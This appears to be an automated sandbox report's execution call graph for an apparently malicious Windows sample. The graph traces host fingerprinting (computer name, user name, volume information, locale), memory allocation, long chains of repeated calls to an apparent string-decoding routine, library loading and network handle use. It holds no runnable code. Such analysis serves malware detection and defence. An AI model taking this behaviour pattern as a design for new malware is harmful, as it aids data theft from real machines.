            • VirtualProtect.KERNELBASE(03913594,?,?,?,?,?,?,?,00000000,?,?,00F70A07,?,00000040), ref: 00F70E39
            Memory Dump Source
            • Source File: 00000000.00000002.2135891784.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f70000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: e09c56b172cccb4cde2bd730106a7d5b4dbd137b1d85e7de0b62a75c72723a43
            • Instruction ID: 9c02c06f79a132eec1d2fad43d92e3a3c7ab5c720422d8eb3160e8b04dd1f07b
            • Opcode Fuzzy Hash: e09c56b172cccb4cde2bd730106a7d5b4dbd137b1d85e7de0b62a75c72723a43
            • Instruction Fuzzy Hash: 7821C0B5905619EFCB10DF9AD884ADEFBB4FF48314F10812AE918A7200D7B4A954CFA5

            Execution Graph

            Execution Coverage:13.5%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:0.7%
            Total number of Nodes:1510
            Total number of Limit Nodes:3
            execution_graph 12803 401190 12808 417380 12803->12808 12805 40119e 12807 4011b7 12805->12807 12812 4172f0 12805->12812 12809 4173b6 GetComputerNameA 12808->12809 12811 4173d9 12809->12811 12811->12805 12813 417326 GetUserNameA 12812->12813 12815 417363 12813->12815 12815->12807 12816 416490 12834 4022a0 12816->12834 12820 4164a0 12928 401160 GetSystemInfo 12820->12928 12826 4164c1 12827 4164c6 GetUserDefaultLCID 12826->12827 12828 4172f0 GetUserNameA 12827->12828 12829 4164d0 12828->12829 12830 417380 GetComputerNameA 12829->12830 12832 4164e3 12830->12832 12939 4155f0 12832->12939 12833 4165b6 13019 404610 17 API calls 12834->13019 12836 4022b4 12837 404610 34 API calls 12836->12837 12838 4022cd 12837->12838 12839 404610 34 API calls 12838->12839 12840 4022e6 12839->12840 12841 404610 34 API calls 12840->12841 12842 4022ff 12841->12842 12843 404610 34 API calls 12842->12843 12844 402318 12843->12844 12845 404610 34 API calls 12844->12845 12846 402331 12845->12846 12847 404610 34 API calls 12846->12847 12848 40234a 12847->12848 12849 404610 34 API calls 12848->12849 12850 402363 12849->12850 12851 404610 34 API calls 12850->12851 12852 40237c 12851->12852 12853 404610 34 API calls 12852->12853 12854 402395 12853->12854 12855 404610 34 API calls 12854->12855 12856 4023ae 12855->12856 12857 404610 34 API calls 12856->12857 12858 4023c7 12857->12858 12859 404610 34 API calls 12858->12859 12860 4023e0 12859->12860 12861 404610 34 API calls 12860->12861 12862 4023f9 12861->12862 12863 404610 34 API calls 12862->12863 12864 402412 12863->12864 12865 404610 34 API calls 12864->12865 12866 40242b 12865->12866 12867 404610 34 API calls 12866->12867 12868 402444 12867->12868 12869 404610 34 API calls 12868->12869 12870 40245d 12869->12870 12871 404610 34 API calls 12870->12871 12872 402476 12871->12872 12873 404610 34 API calls 12872->12873 12874 40248f 12873->12874 12875 404610 34 API calls 12874->12875 12876 4024a8 12875->12876 12877 404610 34 API calls 12876->12877 12878 4024c1 12877->12878 12879 404610 34 API calls 12878->12879 12880 4024da 12879->12880 12881 404610 34 API calls 12880->12881 12882 4024f3 12881->12882 12883 404610 34 API calls 12882->12883 12884 40250c 12883->12884 12885 404610 34 API calls 12884->12885 12886 402525 12885->12886 12887 404610 34 API calls 12886->12887 12888 40253e 12887->12888 12889 404610 34 API calls 12888->12889 12890 402557 12889->12890 12891 404610 34 API calls 12890->12891 12892 402570 12891->12892 12893 404610 34 API calls 12892->12893 12894 402589 12893->12894 12895 404610 34 API calls 12894->12895 12896 4025a2 12895->12896 12897 404610 34 API calls 12896->12897 12898 4025bb 12897->12898 12899 404610 34 API calls 12898->12899 12900 4025d4 12899->12900 12901 404610 34 API calls 12900->12901 12902 4025ed 12901->12902 12903 404610 34 API calls 12902->12903 12904 402606 12903->12904 12905 404610 34 API calls 12904->12905 12906 40261f 12905->12906 12907 404610 34 API calls 12906->12907 12908 402638 12907->12908 12909 404610 34 API calls 12908->12909 12910 402651 12909->12910 12911 404610 34 API calls 12910->12911 12912 40266a 12911->12912 12913 404610 34 API calls 12912->12913 12914 402683 12913->12914 12915 404610 34 API calls 12914->12915 12916 40269c 12915->12916 12917 404610 34 API calls 12916->12917 12918 4026b5 12917->12918 12919 404610 34 API calls 12918->12919 12920 4026ce 12919->12920 12921 419270 12920->12921 13023 419160 GetPEB 12921->13023 12923 4194a3 LoadLibraryA 12925 4194c1 LoadLibraryA 12923->12925 12924 419278 12924->12923 12927 4194f6 12925->12927 12927->12820 12929 40117c 12928->12929 12930 401110 12929->12930 12931 401131 VirtualAllocExNuma 12930->12931 12932 401141 12931->12932 13024 4010a0 VirtualAlloc 12932->13024 12934 40114e 12935 401220 12934->12935 13026 418450 12935->13026 12938 401249 __aulldiv 12938->12826 12940 4155fd 12939->12940 13028 4026f0 12940->13028 12944 415783 13668 414ff0 12944->13668 12946 4157a3 13673 416fa0 12946->13673 12948 415887 13677 4048d0 12948->13677 12950 41589e 13683 4112b0 12950->13683 12952 4158a6 13691 4059b0 12952->13691 12954 4158e3 13699 410b60 12954->13699 12956 4158ee 12957 4059b0 6 API calls 12956->12957 12958 41592c 12957->12958 13705 4108a0 12958->13705 12960 415937 12961 4059b0 6 API calls 12960->12961 12962 415973 12961->12962 13711 410a50 12962->13711 12964 41597e 13717 411520 12964->13717 12966 41599a 13727 405000 12966->13727 12968 4159bb 13731 410580 12968->13731 12970 415a40 12971 4059b0 6 API calls 12970->12971 12972 415a80 12971->12972 13744 410c80 12972->13744 12974 415a8b 13750 401ec0 12974->13750 12976 415ad0 12977 415b72 12976->12977 12978 415ae0 12976->12978 12980 4059b0 6 API calls 12977->12980 12979 4059b0 6 API calls 12978->12979 12981 415b1a 12979->12981 12982 415b9f 12980->12982 13756 410de0 12981->13756 13766 413070 12982->13766 12985 415b25 13762 4138d0 12985->13762 12986 415b6a 12989 415beb 12986->12989 13773 413bc0 memset 12986->13773 12991 415c10 12989->12991 13793 414260 12989->13793 12994 415c35 12991->12994 13797 414690 12991->13797 12992 415bcc 13787 414be0 12992->13787 12995 415c5a 12994->12995 13811 414850 memset 12994->13811 12999 415c7f 12995->12999 13822 414a20 12995->13822 12997 415cf0 13006 415d93 12997->13006 13007 415d00 12997->13007 13002 415ca4 12999->13002 13828 407750 12999->13828 13003 415cc9 13002->13003 13880 414b30 13002->13880 13003->12997 13884 418ab0 13003->13884 13008 4059b0 6 API calls 13006->13008 13009 4059b0 6 API calls 13007->13009 13010 415dc0 13008->13010 13011 415d3b 13009->13011 13012 413070 6 API calls 13010->13012 13013 410de0 2 API calls 13011->13013 13016 415d8b 13012->13016 13014 415d46 13013->13014 13015 4138d0 9 API calls 13014->13015 13015->13016 13017 4059b0 6 API calls 13016->13017 13018 415dfc 13017->13018 13018->12833 13020 4046e7 13019->13020 13021 4046fc 11 API calls 13020->13021 13022 40479f 6 API calls 13020->13022 13021->13020 13022->12836 13023->12924 13025 4010c2 ctype 13024->13025 13025->12934 13027 401233 GlobalMemoryStatusEx 13026->13027 13027->12938 13029 404610 34 API calls 13028->13029 13030 402704 13029->13030 13031 404610 34 API calls 13030->13031 13032 402727 13031->13032 13033 404610 34 API calls 13032->13033 13034 402740 13033->13034 13035 404610 34 API calls 13034->13035 13036 402759 13035->13036 13037 404610 34 API calls 13036->13037 13038 402786 13037->13038 13039 404610 34 API calls 13038->13039 13040 40279f 13039->13040 13041 404610 34 API calls 13040->13041 13042 4027b8 13041->13042 13043 404610 34 API calls 13042->13043 13044 4027e5 13043->13044 13045 404610 34 API calls 13044->13045 13046 4027fe 13045->13046 13047 404610 34 API calls 13046->13047 13048 402817 13047->13048 13049 404610 34 API calls 13048->13049 13050 402830 13049->13050 13051 404610 34 API calls 13050->13051 13052 402849 13051->13052 13053 404610 34 API calls 13052->13053 13054 402862 13053->13054 13055 404610 34 API calls 13054->13055 13056 40287b 13055->13056 13057 404610 34 API calls 13056->13057 13058 402894 13057->13058 13059 404610 34 API calls 13058->13059 13060 4028ad 13059->13060 13061 404610 34 API calls 13060->13061 13062 4028c6 13061->13062 13063 404610 34 API calls 13062->13063 13064 4028df 13063->13064 13065 404610 34 API calls 13064->13065 13066 4028f8 13065->13066 13067 404610 34 API calls 13066->13067 13068 402911 13067->13068 13069 404610 34 API calls 13068->13069 13070 40292a 13069->13070 13071 404610 34 API calls 13070->13071 13072 402943 13071->13072 13073 404610 34 API calls 13072->13073 13074 40295c 13073->13074 13075 404610 34 API calls 13074->13075 13076 402975 13075->13076 13077 404610 34 API calls 13076->13077 13078 40298e 13077->13078 13079 404610 34 API calls 13078->13079 13080 4029a7 13079->13080 13081 404610 34 API calls 13080->13081 13082 4029c0 13081->13082 13083 404610 34 API calls 13082->13083 13084 4029d9 13083->13084 13085 404610 34 API calls 13084->13085 13086 4029f2 13085->13086 13087 404610 34 API calls 13086->13087 13088 402a0b 13087->13088 13089 404610 34 API calls 13088->13089 13090 402a24 13089->13090 13091 404610 34 API calls 13090->13091 13092 402a3d 13091->13092 13093 404610 34 API calls 13092->13093 13094 402a56 13093->13094 13095 404610 34 API calls 13094->13095 13096 402a6f 13095->13096 13097 404610 34 API calls 13096->13097 13098 402a88 13097->13098 13099 404610 34 API calls 13098->13099 13100 402aa1 13099->13100 13101 404610 34 API calls 13100->13101 13102 402aba 13101->13102 13103 404610 34 API calls 13102->13103 13104 402ad3 13103->13104 13105 404610 34 API calls 13104->13105 13106 402aec 13105->13106 13107 404610 34 API calls 13106->13107 13108 402b05 13107->13108 13109 404610 34 API calls 13108->13109 13110 402b1e 13109->13110 13111 404610 34 API calls 13110->13111 13112 402b37 13111->13112 13113 404610 34 API calls 13112->13113 13114 402b50 13113->13114 13115 404610 34 API calls 13114->13115 13116 402b69 13115->13116 13117 404610 34 API calls 13116->13117 13118 402b82 13117->13118 13119 404610 34 API calls 13118->13119 13120 402b9b 13119->13120 13121 404610 34 API calls 13120->13121 13122 402bb4 13121->13122 13123 404610 34 API calls 13122->13123 13124 402bcd 13123->13124 13125 404610 34 API calls 13124->13125 13126 402be6 13125->13126 13127 404610 34 API calls 13126->13127 13128 402bff 13127->13128 13129 404610 34 API calls 13128->13129 13130 402c18 13129->13130 13131 404610 34 API calls 13130->13131 13132 402c31 13131->13132 13133 404610 34 API calls 13132->13133 13134 402c4a 13133->13134 13135 404610 34 API calls 13134->13135 13136 402c63 13135->13136 13137 404610 34 API calls 13136->13137 13138 402c7c 13137->13138 13139 404610 34 API calls 13138->13139 13140 402c95 13139->13140 13141 404610 34 API calls 13140->13141 13142 402cae 13141->13142 13143 404610 34 API calls 13142->13143 13144 402cc7 13143->13144 13145 404610 34 API calls 13144->13145 13146 402ce0 13145->13146 13147 404610 34 API calls 13146->13147 13148 402cf9 13147->13148 13149 404610 34 API calls 13148->13149 13150 402d12 13149->13150 13151 404610 34 API calls 13150->13151 13152 402d2b 13151->13152 13153 404610 34 API calls 13152->13153 13154 402d44 13153->13154 13155 404610 34 API calls 13154->13155 13156 402d5d 13155->13156 13157 404610 34 API calls 13156->13157 13158 402d76 13157->13158 13159 404610 34 API calls 13158->13159 13160 402d8f 13159->13160 13161 404610 34 API calls 13160->13161 13162 402da8 13161->13162 13163 404610 34 API calls 13162->13163 13164 402dc1 13163->13164 13165 404610 34 API calls 13164->13165 13166 402dda 13165->13166 13167 404610 34 API calls 13166->13167 13168 402df3 13167->13168 13169 404610 34 API calls 13168->13169 13170 402e0c 13169->13170 13171 404610 34 API calls 13170->13171 13172 402e25 13171->13172 13173 404610 34 API calls 13172->13173 13174 402e3e 13173->13174 13175 404610 34 API calls 13174->13175 13176 402e57 13175->13176 13177 404610 34 API calls 13176->13177 13178 402e70 13177->13178 13179 404610 34 API calls 13178->13179 13180 402e89 13179->13180 13181 404610 34 API calls 13180->13181 13182 402ea2 13181->13182 13183 404610 34 API calls 13182->13183 13184 402ebb 13183->13184 13185 404610 34 API calls 13184->13185 13186 402ed4 13185->13186 13187 404610 34 API calls 13186->13187 13188 402eed 13187->13188 13189 404610 34 API calls 13188->13189 13190 402f06 13189->13190 13191 404610 34 API calls 13190->13191 13192 402f1f 13191->13192 13193 404610 34 API calls 13192->13193 13194 402f38 13193->13194 13195 404610 34 API calls 13194->13195 13196 402f51 13195->13196 13197 404610 34 API calls 13196->13197 13198 402f6a 13197->13198 13199 404610 34 API calls 13198->13199 13200 402f83 13199->13200 13201 404610 34 API calls 13200->13201 13202 402f9c 13201->13202 13203 404610 34 API calls 13202->13203 13204 402fb5 13203->13204 13205 404610 34 API calls 13204->13205 13206 402fce 13205->13206 13207 404610 34 API calls 13206->13207 13208 402fe7 13207->13208 13209 404610 34 API calls 13208->13209 13210 403000 13209->13210 13211 404610 34 API calls 13210->13211 13212 403019 13211->13212 13213 404610 34 API calls 13212->13213 13214 403032 13213->13214 13215 404610 34 API calls 13214->13215 13216 40304b 13215->13216 13217 404610 34 API calls 13216->13217 13218 403064 13217->13218 13219 404610 34 API calls 13218->13219 13220 40307d 13219->13220 13221 404610 34 API calls 13220->13221 13222 403096 13221->13222 13223 404610 34 API calls 13222->13223 13224 4030af 13223->13224 13225 404610 34 API calls 13224->13225 13226 4030c8 13225->13226 13227 404610 34 API calls 13226->13227 13228 4030e1 13227->13228 13229 404610 34 API calls 13228->13229 13230 4030fa 13229->13230 13231 404610 34 API calls 13230->13231 13232 403113 13231->13232 13233 404610 34 API calls 13232->13233 13234 40312c 13233->13234 13235 404610 34 API calls 13234->13235 13236 403145 13235->13236 13237 404610 34 API calls 13236->13237 13238 40315e 13237->13238 13239 404610 34 API calls 13238->13239 13240 403177 13239->13240 13241 404610 34 API calls 13240->13241 13242 403190 13241->13242 13243 404610 34 API calls 13242->13243 13244 4031a9 13243->13244 13245 404610 34 API calls 13244->13245 13246 4031c2 13245->13246 13247 404610 34 API calls 13246->13247 13248 4031db 13247->13248 13249 404610 34 API calls 13248->13249 13250 4031f4 13249->13250 13251 404610 34 API calls 13250->13251 13252 40320d 13251->13252 13253 404610 34 API calls 13252->13253 13254 403226 13253->13254 13255 404610 34 API calls 13254->13255 13256 40323f 13255->13256 13257 404610 34 API calls 13256->13257 13258 403258 13257->13258 13259 404610 34 API calls 13258->13259 13260 403271 13259->13260 13261 404610 34 API calls 13260->13261 13262 40328a 13261->13262 13263 404610 34 API calls 13262->13263 13264 4032a3 13263->13264 13265 404610 34 API calls 13264->13265 13266 4032bc 13265->13266 13267 404610 34 API calls 13266->13267 13268 4032d5 13267->13268 13269 404610 34 API calls 13268->13269 13270 4032ee 13269->13270 13271 404610 34 API calls 13270->13271 13272 403307 13271->13272 13273 404610 34 API calls 13272->13273 13274 403320 13273->13274 13275 404610 34 API calls 13274->13275 13276 403339 13275->13276 13277 404610 34 API calls 13276->13277 13278 403352 13277->13278 13279 404610 34 API calls 13278->13279 13280 40336b 13279->13280 13281 404610 34 API calls 13280->13281 13282 403384 13281->13282 13283 404610 34 API calls 13282->13283 13284 40339d 13283->13284 13285 404610 34 API calls 13284->13285 13286 4033b6 13285->13286 13287 404610 34 API calls 13286->13287 13288 4033cf 13287->13288 13289 404610 34 API calls 13288->13289 13290 4033e8 13289->13290 13291 404610 34 API calls 13290->13291 13292 403401 13291->13292 13293 404610 34 API calls 13292->13293 13294 40341a 13293->13294 13295 404610 34 API calls 13294->13295 13296 403433 13295->13296 13297 404610 34 API calls 13296->13297 13298 40344c 13297->13298 13299 404610 34 API calls 13298->13299 13300 403465 13299->13300 13301 404610 34 API calls 13300->13301 13302 40347e 13301->13302 13303 404610 34 API calls 13302->13303 13304 403497 13303->13304 13305 404610 34 API calls 13304->13305 13306 4034b0 13305->13306 13307 404610 34 API calls 13306->13307 13308 4034c9 13307->13308 13309 404610 34 API calls 13308->13309 13310 4034e2 13309->13310 13311 404610 34 API calls 13310->13311 13312 4034fb 13311->13312 13313 404610 34 API calls 13312->13313 13314 403514 13313->13314 13315 404610 34 API calls 13314->13315 13316 40352d 13315->13316 13317 404610 34 API calls 13316->13317 13318 403546 13317->13318 13319 404610 34 API calls 13318->13319 13320 40355f 13319->13320 13321 404610 34 API calls 13320->13321 13322 403578 13321->13322 13323 404610 34 API calls 13322->13323 13324 403591 13323->13324 13325 404610 34 API calls 13324->13325 13326 4035aa 13325->13326 13327 404610 34 API calls 13326->13327 13328 4035c3 13327->13328 13329 404610 34 API calls 13328->13329 13330 4035dc 13329->13330 13331 404610 34 API calls 13330->13331 13332 4035f5 13331->13332 13333 404610 34 API calls 13332->13333 13334 40360e 13333->13334 13335 404610 34 API calls 13334->13335 13336 403627 13335->13336 13337 404610 34 API calls 13336->13337 13338 403640 13337->13338 13339 404610 34 API calls 13338->13339 13340 403659 13339->13340 13341 404610 34 API calls 13340->13341 13342 403672 13341->13342 13343 404610 34 API calls 13342->13343 13344 40368b 13343->13344 13345 404610 34 API calls 13344->13345 13346 4036a4 13345->13346 13347 404610 34 API calls 13346->13347 13348 4036bd 13347->13348 13349 404610 34 API calls 13348->13349 13350 4036d6 13349->13350 13351 404610 34 API calls 13350->13351 13352 4036ef 13351->13352 13353 404610 34 API calls 13352->13353 13354 403708 13353->13354 13355 404610 34 API calls 13354->13355 13356 403721 13355->13356 13357 404610 34 API calls 13356->13357 13358 40373a 13357->13358 13359 404610 34 API calls 13358->13359 13360 403753 13359->13360 13361 404610 34 API calls 13360->13361 13362 40376c 13361->13362 13363 404610 34 API calls 13362->13363 13364 403785 13363->13364 13365 404610 34 API calls 13364->13365 13366 40379e 13365->13366 13367 404610 34 API calls 13366->13367 13368 4037b7 13367->13368 13369 404610 34 API calls 13368->13369 13370 4037d0 13369->13370 13371 404610 34 API calls 13370->13371 13372 4037e9 13371->13372 13373 404610 34 API calls 13372->13373 13374 403802 13373->13374 13375 404610 34 API calls 13374->13375 13376 40381b 13375->13376 13377 404610 34 API calls 13376->13377 13378 403834 13377->13378 13379 404610 34 API calls 13378->13379 13380 40384d 13379->13380 13381 404610 34 API calls 13380->13381 13382 403866 13381->13382 13383 404610 34 API calls 13382->13383 13384 40387f 13383->13384 13385 404610 34 API calls 13384->13385 13386 403898 13385->13386 13387 404610 34 API calls 13386->13387 13388 4038b1 13387->13388 13389 404610 34 API calls 13388->13389 13390 4038ca 13389->13390 13391 404610 34 API calls 13390->13391 13392 4038e3 13391->13392 13393 404610 34 API calls 13392->13393 13394 4038fc 13393->13394 13395 404610 34 API calls 13394->13395 13396 403915 13395->13396 13397 404610 34 API calls 13396->13397 13398 40392e 13397->13398 13399 404610 34 API calls 13398->13399 13400 403947 13399->13400 13401 404610 34 API calls 13400->13401 13402 403960 13401->13402 13403 404610 34 API calls 13402->13403 13404 403979 13403->13404 13405 404610 34 API calls 13404->13405 13406 403992 13405->13406 13407 404610 34 API calls 13406->13407 13408 4039ab 13407->13408 13409 404610 34 API calls 13408->13409 13410 4039c4 13409->13410 13411 404610 34 API calls 13410->13411 13412 4039dd 13411->13412 13413 404610 34 API calls 13412->13413 13414 4039f6 13413->13414 13415 404610 34 API calls 13414->13415 13416 403a0f 13415->13416 13417 404610 34 API calls 13416->13417 13418 403a28 13417->13418 13419 404610 34 API calls 13418->13419 13420 403a41 13419->13420 13421 404610 34 API calls 13420->13421 13422 403a5a 13421->13422 13423 404610 34 API calls 13422->13423 13424 403a73 13423->13424 13425 404610 34 API calls 13424->13425 13426 403a8c 13425->13426 13427 404610 34 API calls 13426->13427 13428 403aa5 13427->13428 13429 404610 34 API calls 13428->13429 13430 403abe 13429->13430 13431 404610 34 API calls 13430->13431 13432 403ad7 13431->13432 13433 404610 34 API calls 13432->13433 13434 403af0 13433->13434 13435 404610 34 API calls 13434->13435 13436 403b09 13435->13436 13437 404610 34 API calls 13436->13437 13438 403b22 13437->13438 13439 404610 34 API calls 13438->13439 13440 403b3b 13439->13440 13441 404610 34 API calls 13440->13441 13442 403b54 13441->13442 13443 404610 34 API calls 13442->13443 13444 403b6d 13443->13444 13445 404610 34 API calls 13444->13445 13446 403b86 13445->13446 13447 404610 34 API calls 13446->13447 13448 403b9f 13447->13448 13449 404610 34 API calls 13448->13449 13450 403bb8 13449->13450 13451 404610 34 API calls 13450->13451 13452 403bd1 13451->13452 13453 404610 34 API calls 13452->13453 13454 403bea 13453->13454 13455 404610 34 API calls 13454->13455 13456 403c03 13455->13456 13457 404610 34 API calls 13456->13457 13458 403c1c 13457->13458 13459 404610 34 API calls 13458->13459 13460 403c35 13459->13460 13461 404610 34 API calls 13460->13461 13462 403c4e 13461->13462 13463 404610 34 API calls 13462->13463 13464 403c67 13463->13464 13465 404610 34 API calls 13464->13465 13466 403c80 13465->13466 13467 404610 34 API calls 13466->13467 13468 403c99 13467->13468 13469 404610 34 API calls 13468->13469 13470 403cb2 13469->13470 13471 404610 34 API calls 13470->13471 13472 403ccb 13471->13472 13473 404610 34 API calls 13472->13473 13474 403ce4 13473->13474 13475 404610 34 API calls 13474->13475 13476 403cfd 13475->13476 13477 404610 34 API calls 13476->13477 13478 403d16 13477->13478 13479 404610 34 API calls 13478->13479 13480 403d2f 13479->13480 13481 404610 34 API calls 13480->13481 13482 403d48 13481->13482 13483 404610 34 API calls 13482->13483 13484 403d61 13483->13484 13485 404610 34 API calls 13484->13485 13486 403d7a 13485->13486 13487 404610 34 API calls 13486->13487 13488 403d93 13487->13488 13489 404610 34 API calls 13488->13489 13490 403dac 13489->13490 13491 404610 34 API calls 13490->13491 13492 403dc5 13491->13492 13493 404610 34 API calls 13492->13493 13494 403dde 13493->13494 13495 404610 34 API calls 13494->13495 13496 403df7 13495->13496 13497 404610 34 API calls 13496->13497 13498 403e10 13497->13498 13499 404610 34 API calls 13498->13499 13500 403e29 13499->13500 13501 404610 34 API calls 13500->13501 13502 403e42 13501->13502 13503 404610 34 API calls 13502->13503 13504 403e5b 13503->13504 13505 404610 34 API calls 13504->13505 13506 403e74 13505->13506 13507 404610 34 API calls 13506->13507 13508 403e8d 13507->13508 13509 404610 34 API calls 13508->13509 13510 403ea6 13509->13510 13511 404610 34 API calls 13510->13511 13512 403ebf 13511->13512 13513 404610 34 API calls 13512->13513 13514 403ed8 13513->13514 13515 404610 34 API calls 13514->13515 13516 403ef1 13515->13516 13517 404610 34 API calls 13516->13517 13518 403f0a 13517->13518 13519 404610 34 API calls 13518->13519 13520 403f23 13519->13520 13521 404610 34 API calls 13520->13521 13522 403f3c 13521->13522 13523 404610 34 API calls 13522->13523 13524 403f55 13523->13524 13525 404610 34 API calls 13524->13525 13526 403f6e 13525->13526 13527 404610 34 API calls 13526->13527 13528 403f87 13527->13528 13529 404610 34 API calls 13528->13529 13530 403fa0 13529->13530 13531 404610 34 API calls 13530->13531 13532 403fb9 13531->13532 13533 404610 34 API calls 13532->13533 13534 403fd2 13533->13534 13535 404610 34 API calls 13534->13535 13536 403feb 13535->13536 13537 404610 34 API calls 13536->13537 13538 404004 13537->13538 13539 404610 34 API calls 13538->13539 13540 40401d 13539->13540 13541 404610 34 API calls 13540->13541 13542 404036 13541->13542 13543 404610 34 API calls 13542->13543 13544 40404f 13543->13544 13545 404610 34 API calls 13544->13545 13546 404068 13545->13546 13547 404610 34 API calls 13546->13547 13548 404081 13547->13548 13549 404610 34 API calls 13548->13549 13550 40409a 13549->13550 13551 404610 34 API calls 13550->13551 13552 4040b3 13551->13552 13553 404610 34 API calls 13552->13553 13554 4040cc 13553->13554 13555 404610 34 API calls 13554->13555 13556 4040e5 13555->13556 13557 404610 34 API calls 13556->13557 13558 4040fe 13557->13558 13559 404610 34 API calls 13558->13559 13560 404117 13559->13560 13561 404610 34 API calls 13560->13561 13562 404130 13561->13562 13563 404610 34 API calls 13562->13563 13564 404149 13563->13564 13565 404610 34 API calls 13564->13565 13566 404162 13565->13566 13567 404610 34 API calls 13566->13567 13568 40417b 13567->13568 13569 404610 34 API calls 13568->13569 13570 404194 13569->13570 13571 404610 34 API calls 13570->13571 13572 4041ad 13571->13572 13573 404610 34 API calls 13572->13573 13574 4041c6 13573->13574 13575 404610 34 API calls 13574->13575 13576 4041df 13575->13576 13577 404610 34 API calls 13576->13577 13578 4041f8 13577->13578 13579 404610 34 API calls 13578->13579 13580 404211 13579->13580 13581 404610 34 API calls 13580->13581 13582 40422a 13581->13582 13583 404610 34 API calls 13582->13583 13584 404243 13583->13584 13585 404610 34 API calls 13584->13585 13586 40425c 13585->13586 13587 404610 34 API calls 13586->13587 13588 404275 13587->13588 13589 404610 34 API calls 13588->13589 13590 40428e 13589->13590 13591 404610 34 API calls 13590->13591 13592 4042a7 13591->13592 13593 404610 34 API calls 13592->13593 13594 4042c0 13593->13594 13595 404610 34 API calls 13594->13595 13596 4042d9 13595->13596 13597 404610 34 API calls 13596->13597 13598 4042f2 13597->13598 13599 404610 34 API calls 13598->13599 13600 40430b 13599->13600 13601 404610 34 API calls 13600->13601 13602 404324 13601->13602 13603 404610 34 API calls 13602->13603 13604 40433d 13603->13604 13605 404610 34 API calls 13604->13605 13606 404356 13605->13606 13607 404610 34 API calls 13606->13607 13608 40436f 13607->13608 13609 404610 34 API calls 13608->13609 13610 404388 13609->13610 13611 404610 34 API calls 13610->13611 13612 4043a1 13611->13612 13613 404610 34 API calls 13612->13613 13614 4043ba 13613->13614 13615 404610 34 API calls 13614->13615 13616 4043d3 13615->13616 13617 404610 34 API calls 13616->13617 13618 4043ec 13617->13618 13619 404610 34 API calls 13618->13619 13620 404405 13619->13620 13621 404610 34 API calls 13620->13621 13622 40441e 13621->13622 13623 404610 34 API calls 13622->13623 13624 404437 13623->13624 13625 404610 34 API calls 13624->13625 13626 404450 13625->13626 13627 404610 34 API calls 13626->13627 13628 404469 13627->13628 13629 404610 34 API calls 13628->13629 13630 404482 13629->13630 13631 404610 34 API calls 13630->13631 13632 40449b 13631->13632 13633 404610 34 API calls 13632->13633 13634 4044b4 13633->13634 13635 404610 34 API calls 13634->13635 13636 4044cd 13635->13636 13637 404610 34 API calls 13636->13637 13638 4044e6 13637->13638 13639 404610 34 API calls 13638->13639 13640 4044ff 13639->13640 13641 404610 34 API calls 13640->13641 13642 404518 13641->13642 13643 404610 34 API calls 13642->13643 13644 404531 13643->13644 13645 404610 34 API calls 13644->13645 13646 40454a 13645->13646 13647 404610 34 API calls 13646->13647 13648 404563 13647->13648 13649 404610 34 API calls 13648->13649 13650 40457c 13649->13650 13651 404610 34 API calls 13650->13651 13652 404595 13651->13652 13653 404610 34 API calls 13652->13653 13654 4045ae 13653->13654 13655 404610 34 API calls 13654->13655 13656 4045c7 13655->13656 13657 404610 34 API calls 13656->13657 13658 4045e0 13657->13658 13659 404610 34 API calls 13658->13659 13660 4045f9 13659->13660 13661 4195e0 13660->13661 13662 419a06 LoadLibraryA LoadLibraryA 13661->13662 13665 4195f0 13661->13665 13663 419a36 LoadLibraryA 13662->13663 13664 419a59 LoadLibraryA LoadLibraryA 13663->13664 13667 419a9c 13664->13667 13665->13662 13667->12944 13670 415001 13668->13670 13669 414da0 9 API calls 13669->13670 13670->13669 13671 414cd0 8 API calls 13670->13671 13672 4152bc 13670->13672 13671->13670 13672->12946 13674 416fe8 GetVolumeInformationA 13673->13674 13676 417031 13674->13676 13676->12948 13678 4048e9 13677->13678 13890 404800 13678->13890 13680 404f0e ctype 13680->12950 13681 404ef9 InternetCloseHandle 13681->13680 13682 4048f5 13682->13680 13682->13681 13684 4112d4 13683->13684 13685 4112e7 13684->13685 13686 4112df ExitProcess 13684->13686 13687 4112f7 strtok_s 13685->13687 13690 411304 13687->13690 13688 4114d2 13688->12952 13689 4114ae strtok_s 13689->13690 13690->13688 13690->13689 13692 4059c9 13691->13692 13693 404800 4 API calls 13692->13693 13695 4059d5 13693->13695 13694 405f6a ctype 13694->12954 13695->13694 13696 405f0e memcpy 13695->13696 13697 405f27 13696->13697 13698 405f47 memcpy 13697->13698 13698->13694 13898 41a4a0 13699->13898 13701 410b87 strtok_s 13703 410b94 13701->13703 13702 410c61 13702->12956 13703->13702 13704 410c3d strtok_s 13703->13704 13704->13703 13899 41a4a0 13705->13899 13707 4108c7 strtok_s 13710 4108d4 13707->13710 13708 410a27 13708->12960 13709 410a03 strtok_s 13709->13710 13710->13708 13710->13709 13900 41a4a0 13711->13900 13713 410a77 strtok_s 13714 410a84 13713->13714 13715 410b54 13714->13715 13716 410b30 strtok_s 13714->13716 13715->12964 13716->13714 13718 411536 13717->13718 13719 416fa0 GetVolumeInformationA 13718->13719 13720 4116a6 13719->13720 13721 4172f0 GetUserNameA 13720->13721 13722 411824 13721->13722 13723 417380 GetComputerNameA 13722->13723 13724 41189e 13723->13724 13901 414c70 13724->13901 13726 4121a9 13726->12966 13729 405020 13727->13729 13728 4050c0 memcpy 13728->13729 13729->13728 13730 4050f0 13729->13730 13730->12968 13915 409920 13731->13915 13733 410599 13734 410878 13733->13734 13735 4105bd 13733->13735 13942 410090 13734->13942 13742 410683 13735->13742 13918 40f940 13735->13918 13737 41088e 13737->12970 13739 41086d 13739->12970 13740 4107ab 13740->13739 13934 40fe70 13740->13934 13742->13740 13926 40fba0 13742->13926 14100 41a4a0 13744->14100 13746 410ca7 strtok_s 13749 410cb4 13746->13749 13747 410dc0 13747->12974 13748 410d9c strtok_s 13748->13749 13749->13747 13749->13748 13754 401ecf 13750->13754 13751 401f77 14105 401310 memset 13751->14105 13753 401f8d 13753->12976 13754->13751 14101 401710 13754->14101 14111 41a4a0 13756->14111 13758 410e16 strtok_s 13761 410e4b ctype 13758->13761 13759 411283 13759->12985 13760 411250 strtok_s 13760->13761 13761->13759 13761->13760 13765 4138df 13762->13765 13763 413928 13763->12986 13765->13763 14112 4137a0 13765->14112 14125 41a4a0 13766->14125 13768 413097 strtok_s 13772 4130b1 13768->13772 13769 4131d7 strtok_s 13769->13772 13770 4131fb 13770->12986 